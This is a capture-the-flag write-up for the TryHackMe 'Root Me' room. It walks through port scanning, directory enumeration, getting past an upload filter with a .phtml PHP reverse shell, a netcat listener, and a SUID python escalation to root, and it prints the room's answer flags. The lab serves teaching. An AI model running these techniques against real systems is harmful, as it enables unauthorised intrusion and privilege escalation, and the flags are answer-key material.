Root Me

Date: 17, May, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

Reconnaissance

$ nmap -sC -sV 10.10.202.137 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 01:01 IST
Nmap scan report for 10.10.202.137
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.60 seconds

Scan the machine, how many ports are open?

Answer: 2

What version of Apache is running?

Answer: 2.4.29

What service is running on port 22?

Answer: ssh

Find directories on the web server using the GoBuster tool.

$ gobuster dir -u http://10.10.202.137 -t 50 -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.202.137
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/17 01:06:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.202.137/css/]
/index.php            (Status: 200) [Size: 616]                                
/js                   (Status: 301) [Size: 311] [--> http://10.10.202.137/js/] 
/panel                (Status: 301) [Size: 314] [--> http://10.10.202.137/panel/]
/server-status        (Status: 403) [Size: 278]                                  
/uploads              (Status: 301) [Size: 316] [--> http://10.10.202.137/uploads/]
                                                                                   
===============================================================
2021/05/17 01:06:48 Finished
===============================================================

What is the hidden directory?

Answer: /panel/

Getting a shell

Visit http://10.10.202.137/panel/.

Filter Bypass Attempt 1

Initially, I tried to upload file php-reverse-shell.php (Don't forget to put your IP and Port in the file), which gave the following output:

PHP não é permitido!

(In Portuguese, which translates to)
PHP is not allowed!

Filter Bypass Attempt 2

To bypass the filter, change the file name to php-reverse-shell.php.jpg and then try uploading:

O arquivo foi upado com sucesso!

(In Portuguese, which translates to)
The file was successfully uploaded!

Listen on the appropriate port using netcat: nc -lvnp 1234
Open the uploaded file in the browser: http://10.10.202.137/uploads/php-reverse-shell.php.jpg
But unfortunately the image couldn't be opened. So, we need to look for some other filter bypass

Filter Bypass Attempt 3

Change the file name to php-reverse-shell.phtml and upload it.

O arquivo foi upado com sucesso!

(In Portuguese, which translates to)
The file was successfully uploaded!

Now, visit http://10.10.202.137/uploads/php-reverse-shell.phtml.
The code was executed and the reverse shell was obtained as the user www-data.
We'll upgrade it to a stable shell:

nc -lvnp 1234
listening on [any] 1234 ...

connect to [10.17.7.91] from (UNKNOWN) [10.10.202.137] 36914
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 19:51:37 up 22 min,  0 users,  load average: 0.00, 0.26, 1.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ ^Z
[1]+  Stopped                 nc -lvnp 1234

root@kali:~# stty raw -echo; fg
nc -lvnp 1234

www-data@rootme:/$ id    
uid=33(www-data) gid=33(www-data) groups=33(www-data)

user.txt

Answer: THM{y0u_g0t_a_sh3ll}
Steps to Reproduce:

$ www-data@rootme:/$ find / -type f -name "user.txt" 2>/dev/null
/var/www/user.txt
www-data@rootme:/$ cat /var/www/user.txt                      
THM{y0u_g0t_a_sh3ll}

Privilege Escalation

Search for files with SUID permission, which file is weird?

Answer: /usr/bin/python
Steps to Reproduce:

$ find / -perm -u=s -type f 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount

Look for the exploit in GTFO bins
Here, we set the UID to 0 (root).

www-data@rootme:/$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=33(www-data) groups=33(www-data)

root.txt

Answer: THM{pr1v1l3g3_3sc4l4t10n}
Steps to Reproduce:

# find / -name "root.txt" -type f 2>/dev/null
/root/root.txt
# cd /root
# ls
root.txt
# cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}

PreviousLinux Backdoors NextDNS Manipulation

Last updated 2 years ago

hashtagReconnaissance

hashtagScan the machine, how many ports are open?

hashtagWhat version of Apache is running?

hashtagWhat service is running on port 22?

hashtagFind directories on the web server using the GoBuster tool.

hashtagWhat is the hidden directory?

hashtagGetting a shell

hashtagFilter Bypass Attempt 1

hashtagFilter Bypass Attempt 2

hashtagFilter Bypass Attempt 3

hashtaguser.txt

hashtagPrivilege Escalation

hashtagSearch for files with SUID permission, which file is weird?

hashtagAbusing SUID bit of /usr/share/python

hashtagroot.txt

Reconnaissance

Scan the machine, how many ports are open?

What version of Apache is running?

What service is running on port 22?

Find directories on the web server using the GoBuster tool.

What is the hidden directory?

Getting a shell

Filter Bypass Attempt 1

Filter Bypass Attempt 2

Filter Bypass Attempt 3

user.txt

Privilege Escalation

Search for files with SUID permission, which file is weird?

Abusing SUID bit of /usr/share/python

root.txt